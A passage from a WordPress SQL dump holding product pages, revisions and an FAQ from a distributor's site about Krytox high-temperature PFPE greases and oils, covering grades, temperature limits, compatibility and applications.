Krytox lubricants.\n', 'XHT-ACX', 'Applications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox XHT-AC and XHT-ACX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox lubricants are the ideal choice in a wide range of industries and applications.\n<br /><br />\nHighest viscosity grease in the XHT-AC series. \n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '674-autosave-v1', '', '', '2016-10-05 17:36:04', '2016-10-05 17:36:04', '', 674, 'https://www.miller-stephenson.com/674-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2273, 2, '2016-10-05 18:02:14', '2016-10-05 18:02:14', '<strong>Krytox XHT-BDX</strong>\nKrytox XHT-BDX series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BDX series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\n\nKrytox XHT-BDX greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BDX greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\n\n<strong>Compatibility with Metals</strong>\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\n\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.', 'XHT-BDX', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. \n<br /><br />\nThis grease has a mid-range viscosity. \n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\n', 'inherit', 'closed', 'closed', '', '697-autosave-v1', '', '', '2016-10-05 18:02:14', '2016-10-05 18:02:14', '', 697, 'https://www.miller-stephenson.com/697-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2274, 2, '2016-10-05 18:03:47', '2016-10-05 18:03:47', 'Krytox XHT-BDZ series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BDZ series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\n\nKrytox XHT-BDZ greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BDZ greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\n\n<strong>Compatibility with Metals</strong>\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\n\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.\n', 'XHT-BDZ', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. \n<br /><br />\nHighest viscosity grease in the XHT-BD Series.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '696-autosave-v1', '', '', '2016-10-05 18:03:47', '2016-10-05 18:03:47', '', 696, 'https://www.miller-stephenson.com/696-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2275, 43, '2016-10-05 18:23:13', '2016-10-05 18:23:13', '', '', '', 'publish', 'closed', 'closed', '', '2275', '', '', '2016-10-05 18:23:13', '2016-10-05 18:23:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/2275/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2276, 2, '2016-10-05 18:26:07', '2016-10-05 18:26:07', 'Krytox XHT-SX grease is a special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-SX grease is nonflammable, oxygencompatible, chemically inert, and provide extended lubrication intervals and longer equipment life.\n\nThe Krytox XHT-SX grease is an extension of the Krytox GPL 240 series and Krytox GPL 20X series, but are designed to give higher performance in the 204–302 °C (400–575 °F) range. Krytox™ XHT-S series greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-SX grease contains no additives, so they are used when a potential for interaction between process chemicals and grease additives exists.\n\nKrytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\n\n<strong>Typical Applications</strong>\n\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox™ XHT-S and XHT-SX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox™ lubricants are the ideal choice in a wide range of industries and applications.\n\n<strong>Compatibility with Metals</strong>\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.\n', 'XHT-SX', 'Krytox XHT-S and XHT-SX greases are special high temperature greases with low oil evaporation that provide long bearing life and are compatible with most elastomers and plastics. These greases provide excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F).\n<br /><br />\nHighest viscosity grease in the XHT-S series.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '671-autosave-v1', '', '', '2016-10-05 18:26:07', '2016-10-05 18:26:07', '', 671, 'https://www.miller-stephenson.com/671-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2277, 2, '2016-10-05 19:07:19', '2016-10-05 19:07:19', '<h1><span style="font-size: 120%;"><strong>Krytox FAQ</strong></span></h1>\r\n<h2><span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span></h2>\r\n<h4><strong>What is Krytox FAQ?</strong></h4>\r\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\r\n<h4><strong>What are the primary differences in Krytox oils?</strong></h4>\r\n<ul>\r\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\r\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\r\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\r\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\r\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\r\n</ul>\r\n<h4><strong>Does Krytox contain silicone?</strong></h4>\r\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\r\n<h4><strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong></h4>\r\n<ul>\r\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\r\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\r\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\r\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\r\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\r\n</ul>\r\n<h4><strong>What is Krytox made of?</strong></h4>\r\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n<h4><span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span></h4>\r\n<h4><strong>Where can Krytox lubricants be used?</strong></h4>\r\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\r\n<ul>\r\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\r\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\r\nplatform gear lubricant, space shuttle lubricant, sealant</li>\r\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\r\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\r\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\r\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\r\n</ul>\r\n<h4><strong>What is the NLGI consistency of Krytox grease grades?</strong></h4>\r\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\r\nmaximize oil content for improved grease performance.\r\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\r\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\r\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\r\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\r\n<h4><strong>Do I need to do anything special before using Krytox in bearings?</strong></h4>\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\r\n<h4><strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong></h4>\r\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\r\npotentially never in the case of sealed systems.\r\n<h4><strong>Can I mix Krytox grease with other greases?</strong></h4>\r\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\r\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\r\n<h4><span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span></h4>\r\n<h4><strong>What approvals and certifications do Krytox lubricants have?</strong></h4>\r\nKrytox lubricants have the following certifications:\r\n<ul>\r\n 	<li>ISO 9001 Certified Quality Management System</li>\r\n 	<li>ISO 14001 Certified Environmental Management System</li>\r\n</ul>\r\nIn addition, certain grades have the following approvals:\r\n<ul>\r\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\r\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\r\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\r\n</ul>\r\nAre Krytox lubricants flammable?\r\n\r\nNo. Krytox lubricants are not combustible, nor do they ignite.\r\n<h4><strong>How stable is Krytox when exposed to chemicals?</strong></h4>\r\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\r\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\r\n<h4><strong>Is Krytox compatible with nonmetallic materials?</strong></h4>\r\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox Lubricants Plastics and Elastomer Compatibility.”\r\n<h4><strong>Is Krytox oil hard to clean up?</strong></h4>\r\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\r\n<h4><strong>What is the shelf life of Krytox lubricants?</strong></h4>\r\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\r\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\r\nLubricants.”\r\n<h4><strong>What lubrication equipment can I use with Krytox grease?</strong></h4>\r\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\r\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\r\n<h4><strong>TO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]</h4>\r\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us or <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here to visit our Krytox database.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Frequently Asked Questions (FAQ)', '', 'publish', 'closed', 'closed', '', 'krytox-faq', '', '', '2016-10-12 20:08:49', '2016-10-12 20:08:49', '', 0, 'https://www.miller-stephenson.com/?p=2277', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2278, 2, '2016-10-05 18:56:59', '2016-10-05 18:56:59', '', 'Krytox FAQ', '', 'inherit', 'closed', 'closed', '', 'krytox-faq', '', '', '2016-10-05 18:57:24', '2016-10-05 18:57:24', '', 2277, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-FAQ.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2279, 2, '2016-10-05 19:07:19', '2016-10-05 19:07:19', '<span style="font-size: 120%;"><strong>Krytox FAQ</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Introduction to Krytox Lubricants</strong></span>\r\n\r\n<strong>What is Krytox FAQ?</strong>\r\n\r\nKrytox is the Chemours brand name for a range of clean, specialty synthetic lubricating materials available in numerous grades for a wide range of applications. Krytox lubricants have become the product of choice where extremely high or low temperature performance, nonflammability, oxygen compatibility, and resistance to aggressive chemicals are required. In this Krytox FAQ we discuss all the uses, applications and specifications of Krytox.\r\n\r\n<strong>What are the primary differences in Krytox oils?</strong>\r\n<ul>\r\n 	<li>Krytox XHT oils have additional treatment to make them more thermally stable at temperatures over 300 °C (572 °F) and have very high viscosity to withstand the temperatures and provide adequate lubrication.</li>\r\n 	<li>Krytox aerospace oils have more strict volatility specifications and are a narrower distillation than GPL oils.</li>\r\n 	<li>Krytox vacuum pump fluids are distilled to give an excellent vapor pressure and are designed for specific OEM pumps.</li>\r\n 	<li>Krytox linear oils have a better viscosity index and operate over a wider temperature range.</li>\r\n 	<li>Krytox GPL oils are formulated to provide a cost effective base oil for industrial applications.</li>\r\n</ul>\r\n<strong>Does Krytox contain silicone?</strong>\r\n\r\nNo. Krytox oils and greases do not contain any silicones,and there are no silicones used in processing.\r\n\r\n<strong>What are the different grades of Krytox GPL lubricants and their typical applications?</strong>\r\n<ul>\r\n 	<li>The Krytox GPL 10X oil /20X grease series contain no additives and can be used on components that come in contact with most chemicals typically used in industry. Typical applications include valves or bearings, seal barrier fluids, instruments, and oxygen systems.</li>\r\n 	<li>The Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or extremely heavily loaded applications.</li>\r\n 	<li>The Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor; it also improves load carrying performance and is ideal for corrosive environments. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.</li>\r\n 	<li>The Krytox GPL 29X greases have EP and anticorrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection.</li>\r\n 	<li>The Krytox GPL 2EX lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anti-corrosion additive.</li>\r\n</ul>\r\n<strong>What is Krytox made of?</strong>\r\n\r\nKrytox fluorinated oils are a series of low molecular weight, fluorine end-capped, homopolymers of hexafluoropropylene epoxide. The polymer chain is completely saturated and contains only the elements carbon, oxygen, and fluorine; hydrogen is not present. On a weight basis, typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\n<span style="font-size: 110%;"><strong>Krytox FAQ Applications</strong></span>\r\n\r\n<strong>Where can Krytox lubricants be used?</strong>\r\n\r\nKrytox lubricants can be used in applications where nonflammability, oxygen compatibility, materials compatibility, high temperature stability, and resistance to aggressive chemicals are requirements. Some examples include:\r\n<ul>\r\n 	<li><strong>Automotive</strong>: Wheel bearing grease, CV joint grease, universal joint grease, fan clutch bearing grease, emission air pump grease, spark plug boot lubricant, weather stripping lubricant, sunroof seal lubricant, clutch throw out bearing grease, ABS system grease, paint plant conveyor bearings, paint spray system valve lubrication, gasoline pump bearings, windshield wiper motors, oil pressure sensors, truck window lift mechanism, sintered bearings in motors, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls</li>\r\n 	<li><strong>Aviation</strong>: Fuel resistant grease, oxygen compatible grease, ventilation fan bearing grease, cruise missile rear main bearing lubricant, starter bearing grease, emergency generator bearing grease, missile launch\r\nplatform gear lubricant, space shuttle lubricant, sealant</li>\r\n 	<li><strong>Pumps</strong>: Vacuum pump fluid for corrosive and hazardous service, bearing grease for chemical pumps, O-ring lubricant, barrier fluid between double mechanical seals • Industrial: Corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, gear oil, linear bearing lubricant, high temperature fans, clean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed-for-life motors, conveyor system in glass and aluminum plants, textile calender roll bearings, brick kiln car bearings, film blowing machines</li>\r\n 	<li><strong>Nuclear</strong>: Submerged sump pump bearings, containment cooling fans, snubbers, control rod drive mechanism fan motors</li>\r\n 	<li><strong>Valves</strong>: Lubricant for valve stem packing, relief valve lubricant, O-ring lubricant, steam turbine control valves, low emissions valve stem packing lubricant</li>\r\n 	<li><strong>Miscellaneous</strong>: Anti-seize lubricant, bolt thread lubricant, water purifier lubricant, self-contained breathing apparatus lubricant, cryogenic lubricant, vacuum system sealant, drive chains, hydraulic fluids, instrument barrier fluids, heat transfer fluids, geothermal system grease, mold release agent, fishing reel grease, industrial toast making oven conveyor bearings, windmill gearboxes, glove curing conveyor</li>\r\n</ul>\r\n<strong>What is the NLGI consistency of Krytox grease grades?</strong>\r\n\r\nGreases are formed by mixing the base oil with a thickener to form a grease. Krytox greases use a special high-thickening efficiency, low molecular weight polytetrafluoroethylene (PTFE) with very small particle sizes as their thickener. This is one of the most thermally stable thickeners for high-temperature, long-term greases. The higher thickening efficiency of the special PTFE thickener allows Chemours to formulate grease to\r\nmaximize oil content for improved grease performance.\r\nGreases can be formulated with different viscosity oils to handle different temperatures and load conditions. High viscosity oils can be used in greases for high temperatures, heavy loads, or low speed applications.\r\nLow viscosity oils can be used in greases where low temperature properties are important or speeds are higher. Lower amounts of thickener form softer or more fluid-like greases. Higher solid levels form harder, stiffer\r\ngreases. Additives are often added to the grease to enhance anti-corrosion protection, raise load carrying ability, or help reduce wear.\r\nOur standard grease grade is NLGI Grade 2; however, upon request, we produce NLGI Grades 000 through 6.\r\n\r\n<strong>Do I need to do anything special before using Krytox in bearings?</strong>\r\n\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used during storage. If hydrocarbon oils are left in a bearing, the oils can form carbon deposits at high temperatures that may accelerate bearing failure. Please ask for “New Bearing Preparation with Krytox Lubricants” for the recommended cleaning and repacking procedure, as well as guidance on how much grease to use and speed considerations.\r\n\r\n<strong>Is ongoing lubrication required once we’ve begun using Krytox?</strong>\r\n\r\nRe-lubrication of bearings may be required: typically every 1–3 months for corrugators, depending on the equipment operating temperature. For other applications, re-lubrication intervals can be from months to years or\r\npotentially never in the case of sealed systems.\r\n\r\n<strong>Can I mix Krytox grease with other greases?</strong>\r\n\r\nThe performance benefits of Krytox grease will not be achieved if Krytox is mixed with a non-perfluoropolyether (PFPE) grease. The performance of the grease mixture will be limited by the properties of the non-PFPE grease in the mixture. Krytox grease will not react with the other grease, nor cause decomposition or any hazardous reactions. The mixing tests that Chemours has done have shown that the mixture sometimes softens up by about one penetration grade when it is heated up. This normally will not be enough change to cause any significant problems.\r\nThe Krytox grease will not stop the other lubricant from breaking down from heat and oxidation. It is likely that the additives in the hydrocarbon grease have coated the bearing surfaces, and the Krytox grease will not be able to adhere to the bearing—so most of it might get thrown out of the bearing.\r\n\r\n<span style="font-size: 110%;"><strong>Characteristics of Krytox FAQ</strong></span>\r\n\r\n<strong>What approvals and certifications do Krytox lubricants have?</strong>\r\n\r\nKrytox lubricants have the following certifications:\r\n<ul>\r\n 	<li>ISO 9001 Certified Quality Management System</li>\r\n 	<li>ISO 14001 Certified Environmental Management System</li>\r\n</ul>\r\nIn addition, certain grades have the following approvals:\r\n<ul>\r\n 	<li>MIL-Spec PRF-27617 approved grades for aerospace and aviation use</li>\r\n 	<li>NSF H-1 food grade lubricants approved for incidental food contact</li>\r\n 	<li>Independently tested and confirmed for LOX and GOX use by major oxygen manufacturers and certification authorities</li>\r\n</ul>\r\nAre Krytox lubricants flammable?\r\n\r\nNo. Krytox lubricants are not combustible, nor do they ignite.\r\n\r\n<strong>How stable is Krytox when exposed to chemicals?</strong>\r\n\r\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\r\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\r\n\r\n<strong>Is Krytox compatible with nonmetallic materials?</strong>\r\n\r\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox Lubricants Plastics and Elastomer Compatibility.”\r\n\r\n<strong>Is Krytox oil hard to clean up?</strong>\r\n\r\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\r\n\r\n<strong>What is the shelf life of Krytox lubricants?</strong>\r\n\r\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\r\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\r\nLubricants.”\r\n\r\n<strong>What lubrication equipment can I use with Krytox grease?</strong>\r\n\r\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\r\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\r\n\r\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox Frequently Asked Questions (FAQ)', '', 'inherit', 'closed', 'closed', '', '2277-revision-v1', '', '', '2016-10-05 19:07:19', '2016-10-05 19:07:19', '', 2277, 'https://www.miller-stephenson.com/2277-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2280, 2, '2016-10-05 19:21:43', '2016-10-05 19:21:43', 'Krytox AUT 2245 performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers. Our family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\n\nAutomotive design engineers have learned that specifying Krytox AUT 2245 during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox lubricants help reduce repair costs and potentially save millions in warranty claims.\n\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\n\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\n\nKrytox AUT 2245 provides longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\n\nKrytox AUT 2245 grease typically lasts 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\n\nTest results have shown that Krytox greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even 